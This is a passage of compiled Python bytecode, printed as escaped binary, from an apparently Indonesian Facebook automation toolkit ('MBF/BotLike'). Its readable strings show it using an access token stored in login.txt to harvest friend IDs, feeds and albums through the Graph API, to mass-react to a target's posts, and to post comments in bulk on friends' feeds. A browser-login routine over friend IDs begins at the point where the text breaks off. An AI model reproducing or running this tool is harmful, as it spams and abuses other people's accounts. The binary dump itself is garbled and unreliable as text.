\x1b[1;91mKembali(\x01\x00\x00\x00Ra\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x07\x00\x00\x00beranda\x1b\x03\x00\x00s\n\x00\x00\x00\x00\x01\x07\x01\x05\x01\x05\x01\x05\x01c\x00\x00\x00\x00\x06\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x87\x04\x00\x00y\xd7\x03t\x00\x00d\x01\x00k\x02\x00r\x92\x00d\x02\x00GHt\x01\x00j\x02\x00d\x03\x00t\x03\x00\x17\x83\x01\x00}\x00\x00t\x01\x00j\x04\x00d\x04\x00t\x03\x00\x17\x83\x01\x00\x01t\x05\x00j\x06\x00|\x00\x00j\x07\x00\x83\x01\x00}\x01\x00x9\x00|\x01\x00d\x05\x00\x19d\x06\x00\x19D])\x00}\x02\x00d\x07\x00|\x02\x00d\x08\x00\x19\x16Gt\x08\x00j\t\x00j\n\x00\x83\x00\x00\x01t\x0b\x00d\t\x00\x83\x01\x00\x01qY\x00W|\x01\x00d\x05\x00\x19d\x06\x00\x19St\x00\x00d\n\x00k\x02\x00r!\x01d\x02\x00GHt\x01\x00j\x02\x00d\x0b\x00t\x03\x00\x17\x83\x01\x00}\x00\x00t\x01\x00j\x04\x00d\x04\x00t\x03\x00\x17\x83\x01\x00\x01t\x05\x00j\x06\x00|\x00\x00j\x07\x00\x83\x01\x00}\x01\x00x9\x00|\x01\x00d\x0c\x00\x19d\x06\x00\x19D])\x00}\x02\x00d\x07\x00|\x02\x00d\x08\x00\x19\x16Gt\x08\x00j\t\x00j\n\x00\x83\x00\x00\x01t\x0b\x00d\t\x00\x83\x01\x00\x01q\xe8\x00W|\x01\x00d\x0c\x00\x19d\x06\x00\x19St\x00\x00d\r\x00k\x02\x00r\xac\x01d\x02\x00GHt\x01\x00j\x02\x00d\x0e\x00t\x03\x00\x17\x83\x01\x00}\x00\x00t\x01\x00j\x04\x00d\x04\x00t\x03\x00\x17\x83\x01\x00\x01t\x05\x00j\x06\x00|\x00\x00j\x07\x00\x83\x01\x00}\x01\x00x9\x00|\x01\x00d\x06\x00\x19D]-\x00}\x02\x00d\x07\x00|\x02\x00d\x0f\x00\x19d\x08\x00\x19\x16Gt\x08\x00j\t\x00j\n\x00\x83\x00\x00\x01t\x0b\x00d\x10\x00\x83\x01\x00\x01qs\x01W|\x01\x00d\x06\x00\x19St\x00\x00d\x11\x00k\x02\x00r;\x02d\x02\x00GHt\x01\x00j\x02\x00d\x12\x00t\x03\x00\x17\x83\x01\x00}\x00\x00t\x01\x00j\x04\x00d\x04\x00t\x03\x00\x17\x83\x01\x00\x01t\x05\x00j\x06\x00|\x00\x00j\x07\x00\x83\x01\x00}\x01\x00x9\x00|\x01\x00d\x11\x00\x19d\x06\x00\x19D])\x00}\x02\x00d\x07\x00|\x02\x00d\x08\x00\x19\x16Gt\x08\x00j\t\x00j\n\x00\x83\x00\x00\x01t\x0b\x00d\x13\x00\x83\x01\x00\x01q\x02\x02W|\x01\x00d\x11
\x00\x19d\x06\x00\x19St\x00\x00d\x14\x00k\x02\x00r\xbe\x02d\x02\x00GHt\x01\x00j\x02\x00d\x15\x00t\x03\x00\x17\x83\x01\x00}\x00\x00t\x01\x00j\x04\x00d\x04\x00t\x03\x00\x17\x83\x01\x00\x01t\x05\x00j\x06\x00|\x00\x00j\x07\x00\x83\x01\x00}\x01\x00x5\x00|\x01\x00d\x06\x00\x19D])\x00}\x02\x00d\x07\x00|\x02\x00d\x08\x00\x19\x16Gt\x08\x00j\t\x00j\n\x00\x83\x00\x00\x01t\x0b\x00d\x10\x00\x83\x01\x00\x01q\x8d\x02W|\x01\x00St\x00\x00d\x16\x00k\x02\x00rM\x03d\x02\x00GHt\x01\x00j\x02\x00d\x17\x00t\x03\x00\x17\x83\x01\x00}\x00\x00t\x01\x00j\x04\x00d\x04\x00t\x03\x00\x17\x83\x01\x00\x01t\x05\x00j\x06\x00|\x00\x00j\x07\x00\x83\x01\x00}\x01\x00x9\x00|\x01\x00d\x16\x00\x19d\x06\x00\x19D])\x00}\x02\x00d\x07\x00|\x02\x00d\x08\x00\x19\x16Gt\x08\x00j\t\x00j\n\x00\x83\x00\x00\x01t\x0b\x00d\x13\x00\x83\x01\x00\x01q\x14\x03W|\x01\x00d\x16\x00\x19d\x06\x00\x19Sd\x02\x00GHt\x01\x00j\x02\x00d\x18\x00t\x0c\x00t\x03\x00f\x02\x00\x16\x83\x01\x00}\x00\x00t\x01\x00j\x04\x00d\x04\x00t\x03\x00\x17\x83\x01\x00\x01t\x05\x00j\x06\x00|\x00\x00j\x07\x00\x83\x01\x00}\x01\x00x9\x00|\x01\x00d\x0c\x00\x19d\x06\x00\x19D])\x00}\x02\x00d\x07\x00|\x02\x00d\x08\x00\x19\x16Gt\x08\x00j\t\x00j\n\x00\x83\x00\x00\x01t\x0b\x00d\t\x00\x83\x01\x00\x01q\x9d\x03W|\x01\x00d\x0c\x00\x19d\x06\x00\x19SWn\xa9\x00\x04t\r\x00k\n\x00r\x10\x04\x01\x01\x01d\x19\x00GHt\x0e\x00d\x1a\x00\x83\x01\x00}\x03\x00t\x0f\x00\x83\x00\x00\x01t\x10\x00\x83\x00\x00\x01t\x11\x00\x83\x00\x00\x01ns\x00\x04t\x01\x00j\x12\x00j\x13\x00k\n\x00rL\x04\x01\x01\x01d\x1b\x00GHt\x0e\x00d\x1a\x00\x83\x01\x00}\x04\x00t\x0f\x00\x83\x00\x00\x01t\x10\x00\x83\x00\x00\x01t\x11\x00\x83\x00\x00\x01n7\x00\x04t\x14\x00k\n\x00r\x82\x04\x01\x01\x01d\x1c\x00GHt\x0e\x00d\x1a\x00\x83\x01\x00}\x05\x00t\x0f\x00\x83\x00\x00\x01t\x10\x00\x83\x00\x00\x01t\x11\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x1d\x00\x00\x00Nt\x08\x00\x00\x00wallposts\x1c\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mLoading...sF\x00\x00\x00https://graph.facebook.com/v3.0/me?fields=home.limit(50)&access_token=s=\x00\x00\x00https://graph.facebook.com/gwimusa3/subscribers?access_token=t\x04\x00\x00\x00homeRt\x00\x00\x00s!\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mID\x1b[1;97m : %sR\x1a\x00\x00\x00g\x9a\x99\x99\x99\x99\x99\xb9?t\x02\x00\x00\x00mesG\x00\x00\x00https://graph.facebook.com/v3.0/me?fields=feed.limit(500)&access_token=t\x04\x00\x00\x00feedt\x03\x00\x00\x00reqsC\x00\x00\x00https://graph.facebook.com/me/friendrequests?limit=50&access_token=t\x04\x00\x00\x00fromg{\x14\xaeG\xe1z\x84?R\xa3\x00\x00\x00sF\x00\x00\x00https://graph.facebook.com/me?fields=friends.limit(5000)&access_token=g\xfc\xa9\xf1\xd2MbP?t\x04\x00\x00\x00subssA\x00\x00\x00https://graph.facebook.com/me/subscribedto?limit=50&access_token=t\x06\x00\x00\x00albumssE\x00\x00\x00https://graph.facebook.com/me?fields=albums.limit(5000)&access_token=sH\x00\x00\x00https://graph.facebook.com/v3.0/%s?fields=feed.limit(50)&access_token=%ss\x10\x00\x00\x00\x1b[1;91m[X] Gagals!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]s\x18\x00\x00\x00\x1b[1;91m[!] Koneksi Errors\x0c\x00\x00\x00[!] 
Terhenti(\x15\x00\x00\x00t\x02\x00\x00\x00WTR\x1d\x00\x00\x00R\x1e\x00\x00\x00R)\x00\x00\x00t\x04\x00\x00\x00postR\x1f\x00\x00\x00R \x00\x00\x00R!\x00\x00\x00R\t\x00\x00\x00Rb\x00\x00\x00Rc\x00\x00\x00R7\x00\x00\x00R\x1a\x00\x00\x00R\'\x00\x00\x00R\x07\x00\x00\x00Ra\x00\x00\x00R\xbc\x00\x00\x00R\xbd\x00\x00\x00R\x87\x00\x00\x00R\x88\x00\x00\x00R{\x00\x00\x00(\x06\x00\x00\x00R\x18\x00\x00\x00t\x06\x00\x00\x00resultRd\x00\x00\x00t\x0e\x00\x00\x00inpuganyanmor1t\x0e\x00\x00\x00inputayanomorlt\x0e\x00\x00\x00inputananomorh(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R\xe4\x00\x00\x00$\x03\x00\x00s\xb0\x00\x00\x00\x00\x03\x03\x01\x0c\x01\x05\x02\x13\x00\x11\x01\x12\x02\x15\x01\x0c\x00\r\x00\x0e\x01\x0c\x02\x0c\x01\x05\x02\x13\x00\x11\x01\x12\x02\x15\x01\x0c\x00\r\x00\x0e\x01\x0c\x02\x0c\x01\x05\x02\x13\x00\x11\x01\x12\x02\x11\x01\x10\x00\r\x00\x0e\x01\x08\x02\x0c\x01\x05\x02\x13\x00\x11\x01\x12\x02\x15\x01\x0c\x00\r\x00\x0e\x01\x0c\x02\x0c\x01\x05\x02\x13\x00\x11\x01\x12\x02\x11\x01\x0c\x00\r\x00\x0e\x01\x04\x02\x0c\x01\x05\x02\x13\x00\x11\x01\x12\x02\x15\x01\x0c\x00\r\x00\x0e\x01\x0c\x03\x05\x02\x19\x00\x11\x01\x12\x02\x15\x01\x0c\x00\r\x00\x0e\x01\x10\x02\r\x01\x05\x01\x0c\x01\x07\x01\x07\x01\n\x01\x13\x01\x05\x01\x0c\x01\x07\x01\x07\x01\n\x01\r\x01\x05\x01\x0c\x01\x07\x01\x07\x01c\x02\x00\x00\x00\x0b\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x84\x01\x00\x00d\x01\x00GHd\x02\x00GHy5\x01d\x03\x00}\x02\x00x\x02\x01|\x00\x00D]\xfa\x00}\x03\x00|\x02\x00|\x01\x00k\x05\x00r0\x00Pn\n\x00|\x02\x00d\x04\x007}\x02\x00i\x02\x00t\x00\x00d\x05\x006t\x01\x00d\x06\x006}\x04\x00d\x07\x00j\x02\x00|\x03\x00d\x08\x00\x19\x83\x01\x00}\x05\x00t\x03\x00j\x04\x00|\x05\x00d\t\x00|\x04\x00\x83\x01\x01}\x06\x00|\x03\x00d\x08\x00\x19j\x05\x00d\n\x00\x83\x01\x00d\x03\x00\x19}\x07\x00y-\x00d\x0b\x00|\x07\x00\x17d\x0c\x00\x17|\x03\x00d\r\x00\x19d\x0e\x00 j\x06\x00d\x0f\x00d\x10\x00\x83\x02\x00\x17d\x11\x00\x17GHWq\x1a\x00\x04t\x07\x00k\n\x00r\x13\x01\x01\x01\x01y%\x00d\x0b\x00|\x07\x00\x17d\x0c\x00\x17|\x03\x00d\x12\x00\x19j\x06\x00d\x0f\x00d\x10\x00\x83\x02\x00\x17GHWq\x14\x01\x04t\x07\x00k\n\x00r\x0f\x01\x01\x01\x01d\x13\x00|\x07\x00\x17d\x14\x00\x17GHq\x14\x01Xq\x1a\x00Xq\x1a\x00Wd\x15\x00GHt\x08\x00d\x16\x00\x83\x01\x00}\x08\x00t\t\x00\x83\x00\x00\x01t\n\x00\x83\x00\x00\x01t\x0b\x00\x83\x00\x00\x01Wn>\x00\x04t\x0c\x00k\n\x00r\x7f\x01\x01\x01\x01t\x08\x00d\x17\x00\x83\x01\x00}\t\x00t\x08\x00d\x16\x00\x83\x01\x00}\n\x00t\t\x00\x83\x00\x00\x01t\n\x00\x83\x00\x00\x01t\x0b\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(\x18\x00\x00\x00Ns\x1b\x00\x00\x00\n\x1b[1;91m[+] \x1b[1;92mMulai...R\\\x00\x00\x00i\x00\x00\x00\x00i\x01\x00\x00\x00R\x84\x00\x00\x00t\x04\x00\x00\x00types(\x00\x00\x00https://graph.facebook.com/{0}/reactionsR\x1a\x00\x00\x00Rt\x00\x00\x00R\xd4\x00\x00\x00s\x10\x00\x00\x00\r\x1b[1;92m[\x1b[1;97ms\x10\x00\x00\x00\x1b[1;92m]\x1b[1;97m t\x07\x00\x00\x00messagei(\x00\x00\x00s\x01\x00\x00\x00\nRf\x00\x00\x00s\x03\x00\x00\x00...t\x05\x00\x00\x00storys\r\x00\x00\x00\r\x1b[1;92m[OK][t\x01\x00\x00\x00]s\x1a\x00\x00\x00\r\x1b[1;91m[+] \x1b[1;92mSelesais!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]s\x0c\x00\x00\x00[!] 
Terhenti(\r\x00\x00\x00R)\x00\x00\x00R\xe9\x00\x00\x00R\x92\x00\x00\x00R\x1d\x00\x00\x00R\xe4\x00\x00\x00Ri\x00\x00\x00R`\x00\x00\x00R\'\x00\x00\x00R\x07\x00\x00\x00Ra\x00\x00\x00R\xbc\x00\x00\x00R\xbd\x00\x00\x00R{\x00\x00\x00(\x0b\x00\x00\x00t\x05\x00\x00\x00postst\x06\x00\x00\x00amountt\x07\x00\x00\x00counterR\xe4\x00\x00\x00t\n\x00\x00\x00parametersRH\x00\x00\x00R\x0f\x00\x00\x00R\x1a\x00\x00\x00R\xa6\x00\x00\x00t\x07\x00\x00\x00tanyak3t\n\x00\x00\x00inputm1eki(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>t\x04\x00\x00\x00like\x80\x03\x00\x00s<\x00\x00\x00\x00\x02\x05\x01\x05\x01\x03\x01\x06\x01\r\x02\x0c\x01\x04\x02\n\x02\x14\x01\x13\x01\x15\x02\x17\x02\x03\x01-\x01\r\x01\x03\x01%\x01\r\x01\x19\x02\x05\x01\x0c\x01\x07\x01\x07\x01\x0b\x01\r\x01\x0c\x01\x0c\x01\x07\x01\x07\x01c\x00\x00\x00\x00\x01\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\x1e\x01\x00\x00y\xff\x00t\x00\x00d\x01\x00\x83\x01\x00}\x00\x00|\x00\x00d\x1a\x00k\x06\x00r+\x00d\x04\x00a\x01\x00t\x02\x00\x83\x00\x00\x01n\xd3\x00|\x00\x00d\x1b\x00k\x06\x00rG\x00d\x07\x00a\x01\x00t\x02\x00\x83\x00\x00\x01n\xb7\x00|\x00\x00d\x1c\x00k\x06\x00rc\x00d\n\x00a\x01\x00t\x02\x00\x83\x00\x00\x01n\x9b\x00|\x00\x00d\x1d\x00k\x06\x00r\x7f\x00d\r\x00a\x01\x00t\x02\x00\x83\x00\x00\x01n\x7f\x00|\x00\x00d\x1e\x00k\x06\x00r\x9b\x00d\x10\x00a\x01\x00t\x02\x00\x83\x00\x00\x01nc\x00|\x00\x00d\x1f\x00k\x06\x00r\xb7\x00d\x13\x00a\x01\x00t\x02\x00\x83\x00\x00\x01nG\x00|\x00\x00d \x00k\x06\x00r\xd7\x00t\x03\x00d\x16\x00\x83\x01\x00\x01t\x04\x00\x83\x00\x00\x01n\'\x00|\x00\x00d\x17\x00k\x02\x00r\xf2\x00d\x18\x00GHt\x05\x00\x83\x00\x00\x01n\x0c\x00d\x19\x00GHt\x05\x00\x83\x00\x00\x01Wn\x18\x00\x04t\x06\x00k\n\x00r\x19\x01\x01\x01\x01t\x05\x00\x83\x00\x00\x01n\x01\x00Xd\x00\x00S(!\x00\x00\x00Ns+\x00\x00\x00\x1b[1;91m\nmbfz\x1b[1;97m/\x1b[1;91mBotLike\x1b[1;97m> R\x93\x00\x00\x00t\x02\x00\x00\x0001t\x04\x00\x00\x00LIKEt\x01\x00\x00\x002t\x02\x00\x00\x0002t\x04\x00\x00\x00LOVEt\x01\x00\x00\x003t\x02\x00\x00\x0003t\x03\x00\x00\x00WOWt\x01\x00\x00\x004t\x02\x00\x00\x0004t\x04\x00\x00\x00HAHAt\x01\x00\x00\x005t\x02\x00\x00\x0005t\x03\x00\x00\x00SADt\x01\x00\x00\x006t\x02\x00\x00\x0006t\x05\x00\x00\x00ANGRYt\x01\x00\x00\x007t\x02\x00\x00\x0007i\x01\x00\x00\x00R\\\x00\x00\x00s\x18\x00\x00\x00\x1b[1;91m[!] Jangan kosongs\x1c\x00\x00\x00\x1b[1;91m[!] 
Yang bener Goblok(\x02\x00\x00\x00R\x93\x00\x00\x00R\xf4\x00\x00\x00(\x02\x00\x00\x00R\xf6\x00\x00\x00R\xf7\x00\x00\x00(\x02\x00\x00\x00R\xf9\x00\x00\x00R\xfa\x00\x00\x00(\x02\x00\x00\x00R\xfc\x00\x00\x00R\xfd\x00\x00\x00(\x02\x00\x00\x00R\xff\x00\x00\x00R\x00\x01\x00\x00(\x02\x00\x00\x00R\x02\x01\x00\x00R\x03\x01\x00\x00(\x02\x00\x00\x00R\x05\x01\x00\x00R\x06\x01\x00\x00(\x07\x00\x00\x00R\x07\x00\x00\x00R\xe9\x00\x00\x00t\t\x00\x00\x00bot_tanyaR7\x00\x00\x00R,\x00\x00\x00R\xbd\x00\x00\x00R{\x00\x00\x00(\x01\x00\x00\x00t\x03\x00\x00\x00cek(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R\xbd\x00\x00\x00\xa8\x03\x00\x00s<\x00\x00\x00\x00\x01\x03\x02\x0c\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\x06\x01\n\x01\x0c\x01\n\x01\n\x02\x0c\x01\x05\x01\n\x02\x05\x01\x0b\x01\r\x01c\x00\x00\x00\x00\x00\x00\x00\x00\x05\x00\x00\x00C\x00\x00\x00s\xd7\x00\x00\x00y\x19\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00a\x02\x00Wn\x18\x00\x04t\x03\x00k\n\x00r3\x00\x01\x01\x01t\x04\x00\x83\x00\x00\x01n\x01\x00Xt\x05\x00\x83\x00\x00\x01t\x06\x00d\x03\x00\x83\x01\x00a\x07\x00t\x07\x00j\x08\x00\x83\x00\x00d\x04\x00k\x02\x00ro\x00t\t\x00\x83\x00\x00\x01t\x06\x00d\x05\x00\x83\x01\x00a\n\x00n\x00\x00t\n\x00d\x06\x00k\x02\x00r\x8a\x00d\x07\x00GHt\x0b\x00\x83\x00\x00\x01n9\x00t\x07\x00d\x08\x00k\x02\x00r\xae\x00t\t\x00\x83\x00\x00\x01t\x0c\x00\x83\x00\x00\x01t\x0b\x00\x83\x00\x00\x01n\x15\x00t\x07\x00d\t\x00k\x02\x00r\xc3\x00d\n\x00a\x07\x00n\x00\x00t\r\x00t\x0e\x00\x83\x00\x00d\x0b\x00\x83\x02\x00\x01d\x00\x00S(\x0c\x00\x00\x00Ns\t\x00\x00\x00login.txtR\x18\x00\x00\x00s?\x00\x00\x00\n\x1b[1;91mmbfz\x1b[1;97m/\x1b[1;91mBotLike\x1b[1;97m/\x1b[1;91mJalur\x1b[1;97m> R\x93\x00\x00\x00s%\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mID Target\x1b[1;97m : R\\\x00\x00\x00s\x18\x00\x00\x00\x1b[1;91m[!] 
Jangan kosongR\xf9\x00\x00\x00R\xf6\x00\x00\x00R\xdb\x00\x00\x00i2\x00\x00\x00(\x0f\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R)\x00\x00\x00R(\x00\x00\x00R-\x00\x00\x00R\xda\x00\x00\x00R\x10\x00\x00\x00R\xe3\x00\x00\x00R\x0b\x00\x00\x00Ra\x00\x00\x00R\x1a\x00\x00\x00R\xbd\x00\x00\x00R\xbc\x00\x00\x00R\xf3\x00\x00\x00R\xe4\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R\x07\x01\x00\x00\xcb\x03\x00\x00s&\x00\x00\x00\x00\x02\x03\x01\x19\x01\r\x01\x0b\x02\x07\x01\x0c\x01\x12\x01\x07\x01\x0f\x01\x0c\x01\x05\x01\n\x01\x0c\x01\x07\x01\x07\x01\n\x01\x0c\x01\t\x01c\x00\x00\x00\x00\r\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\x1b\x02\x00\x00y(\x00t\x00\x00d\x01\x00d\x02\x00\x83\x02\x00j\x01\x00\x83\x00\x00}\x00\x00d\x03\x00GHt\x02\x00d\x04\x00\x83\x01\x00\x01Wn7\x00\x04t\x03\x00k\n\x00ra\x00\x01\x01\x01d\x05\x00d\x06\x00\x14GHd\x07\x00GHd\x08\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x01\x00t\x05\x00\x83\x00\x00\x01n\x01\x00Xt\x06\x00j\x07\x00d\n\x00|\x00\x00\x17\x83\x01\x00}\x02\x00t\x08\x00j\t\x00|\x02\x00\x83\x01\x00}\x03\x00t\n\x00j\x0b\x00d\x0b\x00\x83\x01\x00\x01d\x0c\x00GHd\r\x00d\x0e\x00\x14GHt\x04\x00d\x0f\x00\x83\x01\x00}\x04\x00xi\x01|\x03\x00d\x10\x00\x19d\x11\x00\x19D]Y\x01}\x05\x00|\x05\x00d\x12\x00\x19}\x06\x00d\x13\x00|\x05\x00d\x14\x00\x19\x17GHt\x04\x00d\x15\x00\x83\x01\x00}\x07\x00|\x07\x00d\x16\x00k\x02\x00r\xf5\x00q\xba\x00nh\x00|\x07\x00d\x17\x00k\x02\x00r\x07\x01q\xba\x00nV\x00|\x07\x00d\x18\x00k\x02\x00r\x1d\x01t\x05\x00\x83\x00\x00\x01n@\x00|\x07\x00d\x19\x00k\x02\x00r3\x01t\x05\x00\x83\x00\x00\x01n*\x00t\x06\x00j\x07\x00d\x1a\x00|\x06\x00\x17d\x1b\x00\x17|\x00\x00\x17\x83\x01\x00}\x08\x00t\x08\x00j\t\x00|\x08\x00\x83\x01\x00}\t\x00y\x8a\x00x=\x00|\t\x00d\x1c\x00\x19d\x11\x00\x19D]-\x00}\n\x00t\x0c\x00j\r\x00d\x1a\x00|\n\x00d\x12\x00\x19\x17d\x1d\x00\x17|\x00\x00\x17d\x1e\x00\x17|\x04\x00\x17\x83\x01\x00}\x0b\x00qo\x01Wd\x1f\x00|\x0b\x00j\x0e\x00k\x06\x00r\xca\x01d \x00GHt\x04\x00d\t\x00\x83\x01\x00}\x0c\x00t\x05\x00\x83\x00\x00\x01n\x1c\x00d\x12\x00|\x0b\x00j\x0e\x00k\x06\x00r\xe1\x01d!\x00GHn\x05\x00d"\x00GHWq\xba\x00\x04t\x0f\x00k\n\x00r\x12\x02\x01\x01\x01d#\x00GHt\x04\x00d\t\x00\x83\x01\x00}\x01\x00t\x05\x00\x83\x00\x00\x01q\xba\x00Xq\xba\x00Wd\x00\x00S($\x00\x00\x00Ns\t\x00\x00\x00login.txtR\x18\x00\x00\x00s%\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mTunggu sebentar ...i\x01\x00\x00\x00i\x14\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m=s\x17\x00\x00\x00\x1b[1;91m[X] \x1b[1;92mErrors\'\x00\x00\x00\x1b[1;91m[!] 
\x1b[1;92mPerlu Ambil Id dulu !s!\x00\x00\x00\n\x1b[1;91m[ \x1b[1;97mKembali \x1b[1;91m]s:\x00\x00\x00https://graph.facebook.com/me?fields=friends&access_token=R\x02\x00\x00\x00s\xaf\x03\x00\x00\n\x1b[1;31m __.-/|\n \\`\x1b[1;97mo\x1b[1;31m_\x1b[1;97mO\x1b[1;31m\'\n \x1b[1;93m=\x1b[1;31m( )\x1b[1;93m= \x1b[1;34m+------+\n \x1b[1;35mU\x1b[1;31m| \x1b[1;34m | \x1b[1;37mMBF\x1b[1;91mz \x1b[1;34m|\n\x1b[1;31m /\\ /\\ / | \x1b[1;34m+------+\n\x1b[1;31m ) /^\\) ^\\/ \x1b[1;37m_)\x1b[1;31m\\ \x1b[1;34m |\n\x1b[1;31m ) /^\\/ \x1b[1;37m _)\x1b[1;31m \\ \x1b[1;34m |\n\x1b[1;31m ) _ / / \x1b[1;37m_) \x1b[1;31m \\___\x1b[1;34m|\x1b[1;31m_\n\x1b[1;33m /\\ \x1b[1;31m)/\\/ || | \x1b[1;37m)_)\x1b[1;31m\\___\x1b[1;37m,\x1b[1;34m|\x1b[1;37m))\n\x1b[1;33m< > \x1b[1;31m |\x1b[1;37m(,,) )__) \x1b[1;34m |\n\x1b[1;31m || / \\\x1b[1;37m)___)\x1b[1;31m\\\n\x1b[1;31m | \\____( )___) )____\n\x1b[1;31m \\______(_______\x1b[1;37m;;;\x1b[1;31m)__\x1b[1;37m;;;\x1b[1;31m) \x1b[1;93mCopyright, @\x1b[4mpirmansx\x1b[0m\n\x1b[1;91m.:[ \x1b[1;92mCompiler\x1b[1;97m : \x1b[1;96mZeDD\n\x1b[1;91m | \x1b[1;92mYoutube\x1b[1;97m : UCuZ3LerXYmrvSKmtuJWutsA\n\x1b[1;91m | \x1b[1;92mInstaG\x1b[1;97m : @abdulbasitkambo\n\x1b[1;91m | \x1b[1;92mGitHub\x1b[1;97m : \x1b[4mhttps://github.com/CLB-09\x1b[0mi2\x00\x00\x00s\x08\x00\x00\x00\x1b[1;97m_s*\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mMasukkan komen \x1b[1;97m: R\xa3\x00\x00\x00Rt\x00\x00\x00R\x1a\x00\x00\x00s1\x00\x00\x00\n\x1b[1;91m[+] \x1b[1;92mKomen ke akun \x1b[1;97m: \x1b[1;96mR\x19\x00\x00\x00s7\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mLanjut/Skip/keluar? (l/s/k) \x1b[1;97m: R\x0f\x00\x00\x00t\x01\x00\x00\x00St\x01\x00\x00\x00kt\x01\x00\x00\x00Ks\x1b\x00\x00\x00https://graph.facebook.com/s\x1a\x00\x00\x00?fields=feed&access_token=R\xde\x00\x00\x00s\x18\x00\x00\x00/comments/?access_token=s\t\x00\x00\x00&message=t\x05\x00\x00\x00errors/\x00\x00\x00\x1b[1;91m[Error] Tidak bisa komentar sementara...s\x1b\x00\x00\x00\x1b[1;91m[+] \x1b[1;92mBerhasil.s\x17\x00\x00\x00\x1b[1;91m[X] Komen gagal.s\x11\x00\x00\x00\x1b[1;91m[!] 
Error.(\x10\x00\x00\x00R\x1b\x00\x00\x00R\x1c\x00\x00\x00R7\x00\x00\x00R(\x00\x00\x00R\x07\x00\x00\x00R,\x00\x00\x00Ry\x00\x00\x00Rw\x00\x00\x00R\x1f\x00\x00\x00R\xa4\x00\x00\x00R\x08\x00\x00\x00R\x15\x00\x00\x00R\x1d\x00\x00\x00R\xe4\x00\x00\x00R!\x00\x00\x00R\'\x00\x00\x00(\r\x00\x00\x00R)\x00\x00\x00R\xa6\x00\x00\x00t\x04\x00\x00\x00urlst\x05\x00\x00\x00ambilt\x06\x00\x00\x00komen1t\x01\x00\x00\x00ut\x03\x00\x00\x00idtR&\x00\x00\x00t\x05\x00\x00\x00idpost\x03\x00\x00\x00hast\x02\x00\x00\x00jat\x02\x00\x00\x00cmt\n\x00\x00\x00inputmeki2(\x00\x00\x00\x00(\x00\x00\x00\x00s\x06\x00\x00\x00<seni>R5\x00\x00\x00\xe4\x03\x00\x00sX\x00\x00\x00\x00\x01\x03\x01\x15\x01\x05\x01\x0e\x01\r\x01\t\x01\x05\x01\x05\x01\x0c\x01\x0b\x01\x13\x01\x0f\x01\r\x12\x05\x01\t\x01\x0c\x01\x15\x01\n\x01\r\x01\x0c\x01\x0c\x01\x06\x01\x0c\x01\x06\x01\x0c\x01\n\x01\x0c\x01\n\x02\x1b\x01\x0f\x01\x03\x01\x15\x01+\x01\x0f\x01\x05\x01\x0c\x01\n\x01\x0f\x01\x08\x02\t\x01\r\x01\x05\x01\x0c\x01c\x00\x00\x00\x00\x14\x00\x00\x00\x06\x00\x00\x00C\x00\x00\x00s\xbf\x03\x00\x00g\x00\x00a\x00\x00d\x01\x00a\x01\x00yH\x00t\x02\x00d\x02\x00d\x03\x00\x83\x02\x00j\x03\x00\x83\x00\x00}\x00\x00d\x04\x00GHt\x04\x00d\x05\x00\x83\x01\x00\x01t\x05\x00j\x06\x00d\x06\x00\x83\x01\x00\x01d\x07\x00GHd\x08\x00d\t\x00\x14GHd\n\x00GHWn7\x00\x04t\x07\x00k\n\x00r\x8d\x00\x01\x01\x01d\x0b\x00d\x0c\x00\x14GHd\r\x00GHd\x0e\x00GHt\x08\x00d\x0f\x00\x83\x01\x00}\x01\x00t\t\x00\x83\x00\x00\x01n\x01\x00Xd\x10\x00|\x00\x00\x17}\x02\x00t\n\x00j\x0b\x00t\x0c\x00j\r\x00|\x02\x00\x83\x01\x00j\x0e\x00\x83\x01\x00}\x03\x00d\x11\x00GHd\x08\x00d\x0c\x00\x14GHx\xe4\x02|\x03\x00d\x12\x00\x19D]\xd8\x02}\x04\x00t\x01\x00d\x05\x007a\x01\x00t\x00\x00j\x0f\x00t\x01\x00\x83\x01\x00\x01t\x0c\x00j\r\x00d\x13\x00|\x04\x00d\x14\x00\x19\x17d\x15\x00\x17|\x00\x00\x17\x83\x01\x00}\x05\x00t\n\x00j\x0b\x00|\x05\x00j\x0e\x00\x83\x01\x00}\x06\x00yv\x02t\x10\x00j\x11\x00d\x16\x00\x83\x01\x00}\x07\x00|\x07\x00j\x12\x00|\x06\x00d\x17\x00\x19\x83\x01\x00j\x13\x00\x83\x00\x00}\x08\x00d\x18\x00|\x08\x00k\x06\x00r\xc9\x02t\x14\x00j\x02\x00d\x19\x00\x83\x01\x00\x01t\x15\x00t\x14\x00j\x16\x00_\x17\x00t\x14\x00j\x18\x00d\x1a\x00d\x01\x00\x83\x00\x01\x01|\x06\x00d\x17\x00\x19t\x14\x00d\x1b\x00<t\x14\x00j\x19\x00\x83\x00\x00j\x03\x00\x83\x00\x00}\t\x00t\x10\x00j\x11\x00d\x1c\x00\x83\x01\x00}\n\x00y\x19\x00|\n\x00j\x12\x00|\t\x00\x83\x01\x00j